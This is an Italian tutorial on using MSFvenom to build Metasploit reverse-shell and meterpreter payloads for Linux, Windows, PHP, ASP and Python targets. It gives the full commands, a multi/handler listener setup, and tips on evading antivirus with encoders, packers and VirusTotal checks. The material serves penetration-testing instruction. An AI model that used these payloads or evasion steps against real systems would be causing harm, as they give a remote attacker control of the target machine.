Tutorials

MSFvenom

Guida Approfondita a MSFvenom ---

#exploitation#metasploit

Guida Approfondita a MSFvenom


MSFvenom è uno strumento integrato nel Metasploit Framework che permette di generare payloads malevoli da impiegare in test di penetrazione su diversi sistemi operativi e architetture. Supporta output in numerosi formati (eseguibili, script, shellcode, ecc.) e offre un ampio catalogo di payloads predefiniti.

⚠þ L'utilizzo improprio di msfvenom può costituire reato. Va utilizzato solo in ambienti controllati e con autorizzazione esplicita.

🔧 Sintassi Base

bash
msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORTA> -f <FORMATO> > nome_file
  • -p: specifica il payload.
  • LHOST / LPORT: IP e porta del listener.
  • -f: formato di output (exe, elf, php, asp, etc).
  • >: redirige l'output nel file desiderato.

📂 Esempi di Payload in diversi formati

#### ✅ Linux - ELF

bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
chmod +x rev_shell.elf
./rev_shell.elf

#### 🖥️ Windows - EXE

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

#### 💻 PHP - RAW

bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

⚠️ Verifica sempre i tag PHP: aggiungi manualmente all'inizio del file se mancante.

#### 🔐 ASP - Web Shell

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

#### 🤖 Python

bash
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

⚖️ Setup del Listener su Metasploit

bash
msfconsole
use exploit/multi/handler
set PAYLOAD <payload_usato>
set LHOST <tuo_IP>
set LPORT <tua_porta>
run

Esempio per PHP:

bash
set PAYLOAD php/reverse_php

🔎 Comandi utili

  • Lista payload disponibili:
bash
msfvenom -l payloads
  • Lista formati supportati:
bash
msfvenom -l formats
  • Lista encoder disponibili:
bash
msfvenom -l encoders
  • Aggiunta encoder al payload:
bash
msfvenom -p <payload> -e <encoder> -f <formato>

Esempio:

bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -f exe > shell.exe

⚡ Suggerimenti Operativi

  • Verifica con antivirus: usa tools come VirusTotal per testare la rilevabilità del payload.
  • Obfuscazione: usa encoder o packer per evitare detection.
  • Multi-handler: sempre necessario lato Metasploit per ricevere connessioni reverse.
  • Payloads stageless/staged: assicurati di scegliere il tipo corretto per l'ambiente target (es. reverse_tcp vs reverse_tcp_rc4).

📜 Conclusione

MSFvenom è uno strumento potente per la generazione di payload durante engagement di penetration testing. La padronanza di questo tool consente di adattarsi a diversi scenari, architetture e tecnologie target. L'utilizzo deve sempre essere responsabile e tracciabile.